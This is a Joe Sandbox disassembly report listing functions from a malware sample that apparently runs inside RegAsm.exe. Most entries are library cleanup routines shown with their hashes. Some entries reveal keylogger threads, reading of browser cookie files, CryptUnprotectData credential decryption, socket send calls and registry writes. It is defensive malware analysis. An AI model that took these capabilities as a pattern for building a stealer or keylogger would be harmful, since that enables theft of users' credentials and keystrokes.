                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrlen$lstrcat
                                          • String ID:
                                          • API String ID: 493641738-0
                                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                          Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00450A54
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00450A66
                                          • _free.LIBCMT ref: 00450A78
                                          • _free.LIBCMT ref: 00450A8A
                                          • _free.LIBCMT ref: 00450A9C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                          Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 100091D0
                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                          • _free.LIBCMT ref: 100091E2
                                          • _free.LIBCMT ref: 100091F4
                                          • _free.LIBCMT ref: 10009206
                                          • _free.LIBCMT ref: 10009218
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                          Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00444106
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00444118
                                          • _free.LIBCMT ref: 0044412B
                                          • _free.LIBCMT ref: 0044413C
                                          • _free.LIBCMT ref: 0044414D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                          Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 1000536F
                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                          • _free.LIBCMT ref: 10005381
                                          • _free.LIBCMT ref: 10005394
                                          • _free.LIBCMT ref: 100053A5
                                          • _free.LIBCMT ref: 100053B6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                          Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • _strpbrk.LIBCMT ref: 0044E7B8
                                          • _free.LIBCMT ref: 0044E8D5
                                            • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                            • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                            • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                          • String ID: *?$.
                                          • API String ID: 2812119850-3972193922
                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                          • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                          Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00854950,00000010), ref: 004048E0
                                            • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                                          • String ID: XQG$NG$PG
                                          • API String ID: 1634807452-3565412412
                                          • Opcode ID: 939bf58f81ce87eae8e0c48e6a49ef516d453a11c12e42025cfdb8a130c33550
                                          • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                          • Opcode Fuzzy Hash: 939bf58f81ce87eae8e0c48e6a49ef516d453a11c12e42025cfdb8a130c33550
                                          • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                          Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                          • _free.LIBCMT ref: 004435E0
                                          • _free.LIBCMT ref: 004435EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          • API String ID: 2506810119-1068371695
                                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                          Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                          • _free.LIBCMT ref: 10004CE8
                                          • _free.LIBCMT ref: 10004CF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          • API String ID: 2506810119-1068371695
                                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                          Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                          • String ID: /sort "Visit Time" /stext "$0NG
                                          • API String ID: 368326130-3219657780
                                          • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                          • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                          • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                          • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                          Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcslen.LIBCMT ref: 00416330
                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _wcslen$CloseCreateValue
                                          • String ID: !D@$okmode$PG
                                          • API String ID: 3411444782-3370592832
                                          • Opcode ID: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                                          • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                          • Opcode Fuzzy Hash: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                                          • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                          Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                          Strings
                                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                          • API String ID: 1174141254-1980882731
                                          • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                          • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                          Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                          Strings
                                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                          • API String ID: 1174141254-1980882731
                                          • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                          • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                          Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTimewsprintf
                                          • String ID: Offline Keylogger Started
                                          • API String ID: 465354869-4114347211
                                          • Opcode ID: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                          • Opcode Fuzzy Hash: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                          Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTime$wsprintf
                                          • String ID: Online Keylogger Started
                                          • API String ID: 112202259-1258561607
                                          • Opcode ID: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                          • Opcode Fuzzy Hash: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                          Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: CryptUnprotectData$crypt32
                                          • API String ID: 2574300362-2380590389
                                          • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                          • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                          • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                          • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                          Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandleObjectSingleWait
                                          • String ID: Connection Timeout
                                          • API String ID: 2055531096-499159329
                                          • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                          • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                          • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                          • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                          Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 2005118841-1866435925
                                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                          Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                                          • RegSetValueExW.ADVAPI32 ref: 00413888
                                          • RegCloseKey.ADVAPI32(?), ref: 00413893
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: pth_unenc
                                          • API String ID: 1818849710-4028850238
                                          • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                          • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
